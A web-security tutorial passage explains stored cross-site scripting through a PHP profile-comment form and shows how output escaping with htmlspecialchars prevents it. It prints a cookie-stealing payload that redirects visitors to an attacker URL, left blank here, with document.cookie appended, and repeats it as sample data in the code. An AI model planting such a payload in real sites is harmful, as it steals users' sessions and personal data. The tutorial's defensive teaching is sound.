Cross-site scripting (XSS) is one of the most common and best known kinds of attacks.
The simplicity of this attack and the number of vulnerable applications in
existence make it very attractive to malicious users. An XSS attack exploits the user's
trust in the application and is usually an effort to steal user information, such as
cookies and other personally identifiable data. All applications that display user-supplied
input are at risk.
Consider the following form, for example. A form like this might exist on any of a number
of popular community websites, and it allows a user to add a
comment to another user's profile. After submitting a comment, the page displays
all of the comments that were previously submitted, so that everyone can view all of
the comments left on the user's profile.
<form method="POST" action="process.php">
<p>Add a comment:</p>
<textarea name="comment"></textarea>
<input type="submit" />
</form>
Imagine that a malicious user submits a comment on someone's profile that contains
the following content:
document.location = '' /* attacker-controlled URL, omitted in the source */
+ document.cookie;
Now, everyone visiting this user's profile will be redirected to the given URL, and their
cookies (including any personally identifiable information and login information)
will be appended to the query string. The attacker can easily access the cookies with
$_GET['cookies'] and store them for later use. This attack works only if the application
fails to escape output. Thus, it is easy to prevent this kind of attack with proper
output escaping.
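The following is an added example, not code from the original text, showing the comment display described above in both its unescaped and its escaped form. The comment array, the helper names and the use of htmlspecialchars() are assumptions for this illustration; the original does not show how comments are stored or rendered.

```php
<?php
// Added example: rendering stored profile comments with output escaping.
// Comments are stored exactly as submitted; escaping happens only at the
// point where they are written into HTML.

// Constructed sample data standing in for what process.php would have stored.
$comments = [
    'Nice profile!',
    '<script>document.location = "..." + document.cookie;</script>',
];

// Escape a value for an HTML text or attribute context.
// ENT_QUOTES covers both quote characters, so the same helper is safe
// inside attribute values; the charset must match the page's encoding.
function escape_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// The vulnerable pattern: stored input is echoed raw, so any markup in a
// comment is interpreted by every visitor's browser.
function render_comments_unescaped(array $comments): string
{
    $html = '';
    foreach ($comments as $comment) {
        $html .= "<p>{$comment}</p>\n";
    }
    return $html;
}

// The hardened pattern: '<' becomes '&lt;', so the browser shows the
// comment as text instead of executing it.
function render_comments(array $comments): string
{
    $html = '';
    foreach ($comments as $comment) {
        $html .= '<p>' . escape_html($comment) . "</p>\n";
    }
    return $html;
}

// Quick self-check: the escaped output contains no live <script> tag.
$safe = render_comments($comments);
if (stripos($safe, '<script') !== false) {
    throw new RuntimeException('escaping failed');
}
echo $safe;
```

The same escape_html() call applies wherever stored input is placed into HTML, including the form's own fields if they are ever pre-filled from user data.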